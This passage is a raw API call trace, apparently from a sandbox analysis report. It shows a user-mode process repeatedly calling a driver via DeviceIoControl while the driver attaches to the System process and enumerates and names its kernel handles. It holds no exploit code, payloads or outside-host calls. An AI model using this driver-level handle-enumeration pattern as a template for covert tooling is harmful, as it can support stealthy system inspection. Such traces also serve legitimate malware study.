Object=0xfffff88005163548*=0xfffffa8003903e20, HandleInformation=0x0) returned 0x0 [0118.427] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.427] PsReleaseProcessExitSynchronization () returned 0x2 [0118.427] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.427] ObQueryNameString (in: Object=0xfffffa8003903e20, ObjectNameInfo=0xfffffa800286e044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800286e044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.427] ObfDereferenceObject (Object=0xfffffa8003903e20) returned 0x1 [0118.427] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.427] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.428] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.428] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x128, lpOverlapped=0x0) returned 1 [0118.428] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.428] PsAcquireProcessExitSynchronization () returned 0x0 [0118.428] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.428] ObReferenceObjectByHandle (in: Handle=0xffffffff800003e4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002e696d0, HandleInformation=0x0) returned 0x0 [0118.428] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.428] PsReleaseProcessExitSynchronization () returned 0x2 [0118.428] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.428] ObQueryNameString (in: Object=0xfffffa8002e696d0, ObjectNameInfo=0xfffffa800286f044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800286f044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.428] ObfDereferenceObject (Object=0xfffffa8002e696d0) returned 0x2 [0118.428] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.428] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.428] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.428] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x128, lpOverlapped=0x0) returned 1 [0118.428] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.428] PsAcquireProcessExitSynchronization () returned 0x0 [0118.428] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.428] ObReferenceObjectByHandle (in: Handle=0xffffffff800003e8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80038ebf20, HandleInformation=0x0) returned 0x0 [0118.428] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.428] PsReleaseProcessExitSynchronization () returned 0x2 [0118.428] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.428] ObQueryNameString (in: Object=0xfffffa80038ebf20, ObjectNameInfo=0xfffffa800287b044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800287b044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.429] ObfDereferenceObject (Object=0xfffffa80038ebf20) returned 0x2 [0118.429] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.429] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.429] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.429] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x14, lpOverlapped=0x0) returned 1 [0118.429] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.429] PsAcquireProcessExitSynchronization () returned 0x0 [0118.429] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.429] ObReferenceObjectByHandle (in: Handle=0xffffffff800003f0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002e6a7d0, HandleInformation=0x0) returned 0x0 [0118.429] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.429] PsReleaseProcessExitSynchronization () returned 0x2 [0118.429] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.429] ObQueryNameString (in: Object=0xfffffa8002e6a7d0, ObjectNameInfo=0xfffffa800287c044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800287c044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.429] ObfDereferenceObject (Object=0xfffffa8002e6a7d0) returned 0x1 [0118.429] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.429] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.429] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.429] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x14, lpOverlapped=0x0) returned 1 [0118.429] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.429] PsAcquireProcessExitSynchronization () returned 0x0 [0118.429] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.430] ObReferenceObjectByHandle (in: Handle=0xffffffff800003f4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80038eb730, HandleInformation=0x0) returned 0x0 [0118.430] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.430] PsReleaseProcessExitSynchronization () returned 0x2 [0118.430] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.430] ObQueryNameString (in: Object=0xfffffa80038eb730, ObjectNameInfo=0xfffffa800287d044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800287d044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.430] ObfDereferenceObject (Object=0xfffffa80038eb730) returned 0x2 [0118.430] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.430] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.430] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.430] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x122, lpOverlapped=0x0) returned 1 [0118.430] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.430] PsAcquireProcessExitSynchronization () returned 0x0 [0118.430] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.430] ObReferenceObjectByHandle (in: Handle=0xffffffff80000404, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002e68dc0, HandleInformation=0x0) returned 0x0 [0118.430] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.430] PsReleaseProcessExitSynchronization () returned 0x2 [0118.430] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.430] ObQueryNameString (in: Object=0xfffffa8002e68dc0, ObjectNameInfo=0xfffffa800287f044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800287f044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.430] ObfDereferenceObject (Object=0xfffffa8002e68dc0) returned 0x2 [0118.430] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.430] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.430] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.430] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0xc8, lpOverlapped=0x0) returned 1 [0118.431] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.431] PsAcquireProcessExitSynchronization () returned 0x0 [0118.437] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.437] ObReferenceObjectByHandle (in: Handle=0xffffffff80000408, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80028e0a20, HandleInformation=0x0) returned 0x0 [0118.437] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.437] PsReleaseProcessExitSynchronization () returned 0x2 [0118.437] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.437] ObQueryNameString (in: Object=0xfffffa80028e0a20, ObjectNameInfo=0xfffffa8002880044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002880044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.437] ObfDereferenceObject (Object=0xfffffa80028e0a20) returned 0x1 [0118.437] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.437] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.437] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.437] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0xd2, lpOverlapped=0x0) returned 1 [0118.437] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.437] PsAcquireProcessExitSynchronization () returned 0x0 [0118.437] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.437] ObReferenceObjectByHandle (in: Handle=0xffffffff8000040c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002e664a0, HandleInformation=0x0) returned 0x0 [0118.437] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.438] PsReleaseProcessExitSynchronization () returned 0x2 [0118.438] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.438] ObQueryNameString (in: Object=0xfffffa8002e664a0, ObjectNameInfo=0xfffffa8002882044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002882044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.438] ObfDereferenceObject (Object=0xfffffa8002e664a0) returned 0x1 [0118.438] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.438] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.438] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.438] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0xd2, lpOverlapped=0x0) returned 1 [0118.438] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.438] PsAcquireProcessExitSynchronization () returned 0x0 [0118.438] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.438] ObReferenceObjectByHandle (in: Handle=0xffffffff80000410, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002e68c70, HandleInformation=0x0) returned 0x0 [0118.438] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.438] PsReleaseProcessExitSynchronization () returned 0x2 [0118.438] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.438] ObQueryNameString (in: Object=0xfffffa8002e68c70, ObjectNameInfo=0xfffffa80028811c4, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80028811c4, ReturnLength=0xfffff88005163550) returned 0x0 [0118.438] ObfDereferenceObject (Object=0xfffffa8002e68c70) returned 0x1 [0118.438] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.438] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.439] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.439] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x16c, lpOverlapped=0x0) returned 1 [0118.439] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.439] PsAcquireProcessExitSynchronization () returned 0x0 [0118.439] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.439] ObReferenceObjectByHandle (in: Handle=0xffffffff80000414, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002e653e0, HandleInformation=0x0) returned 0x0 [0118.439] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.439] PsReleaseProcessExitSynchronization () returned 0x2 [0118.439] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.439] ObQueryNameString (in: Object=0xfffffa8002e653e0, ObjectNameInfo=0xfffffa8002879044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002879044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.439] ObfDereferenceObject (Object=0xfffffa8002e653e0) returned 0x2 [0118.439] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.439] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.439] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.439] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x16c, lpOverlapped=0x0) returned 1 [0118.439] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.439] PsAcquireProcessExitSynchronization () returned 0x0 [0118.439] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.439] ObReferenceObjectByHandle (in: Handle=0xffffffff80000418, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002e68470, HandleInformation=0x0) returned 0x0 [0118.439] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.439] PsReleaseProcessExitSynchronization () returned 0x2 [0118.440] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.440] ObQueryNameString (in: Object=0xfffffa8002e68470, ObjectNameInfo=0xfffffa800287a044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800287a044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.440] ObfDereferenceObject (Object=0xfffffa8002e68470) returned 0x2 [0118.440] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.440] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.440] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.440] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x14, lpOverlapped=0x0) returned 1 [0118.440] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.440] PsAcquireProcessExitSynchronization () returned 0x0 [0118.440] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.440] ObReferenceObjectByHandle (in: Handle=0xffffffff80000420, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003908dc0, HandleInformation=0x0) returned 0x0 [0118.440] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.440] PsReleaseProcessExitSynchronization () returned 0x2 [0118.440] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.440] ObQueryNameString (in: Object=0xfffffa8003908dc0, ObjectNameInfo=0xfffffa8002856044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002856044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.440] ObfDereferenceObject (Object=0xfffffa8003908dc0) returned 0x1 [0118.440] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.440] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.440] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.440] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x14, lpOverlapped=0x0) returned 1 [0118.440] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.441] PsAcquireProcessExitSynchronization () returned 0x0 [0118.441] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.441] ObReferenceObjectByHandle (in: Handle=0xffffffff80000424, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80028d6070, HandleInformation=0x0) returned 0x0 [0118.441] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.441] PsReleaseProcessExitSynchronization () returned 0x2 [0118.441] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.441] ObQueryNameString (in: Object=0xfffffa80028d6070, ObjectNameInfo=0xfffffa8002855044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002855044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.441] ObfDereferenceObject (Object=0xfffffa80028d6070) returned 0x2 [0118.441] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.441] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.441] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.441] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0118.441] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.441] PsAcquireProcessExitSynchronization () returned 0x0 [0118.441] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.441] ObReferenceObjectByHandle (in: Handle=0xffffffff80000430, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001f85860, HandleInformation=0x0) returned 0x0 [0118.441] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.441] PsReleaseProcessExitSynchronization () returned 0x2 [0118.441] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.441] ObQueryNameString (in: Object=0xfffffa8001f85860, ObjectNameInfo=0xfffffa8002854044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002854044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.441] ObfDereferenceObject (Object=0xfffffa8001f85860) returned 0x2 [0118.441] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.442] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.442] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.442] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0118.442] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.442] PsAcquireProcessExitSynchronization () returned 0x0 [0118.442] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.442] ObReferenceObjectByHandle (in: Handle=0xffffffff800004a8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003773500, HandleInformation=0x0) returned 0x0 [0118.442] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.442] PsReleaseProcessExitSynchronization () returned 0x2 [0118.442] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.442] ObQueryNameString (in: Object=0xfffffa8003773500, ObjectNameInfo=0xfffffa8002853044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002853044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.442] ObfDereferenceObject (Object=0xfffffa8003773500) returned 0x1 [0118.442] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.442] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.442] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.442] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0118.442] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.442] PsAcquireProcessExitSynchronization () returned 0x0 [0118.442] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.442] ObReferenceObjectByHandle (in: Handle=0xffffffff800004b4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800371d490, HandleInformation=0x0) returned 0x0 [0118.442] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.443] PsReleaseProcessExitSynchronization () returned 0x2 [0118.443] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.443] ObQueryNameString (in: Object=0xfffffa800371d490, ObjectNameInfo=0xfffffa800284f044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800284f044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.443] ObfDereferenceObject (Object=0xfffffa800371d490) returned 0x1 [0118.443] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.443] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.443] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.443] 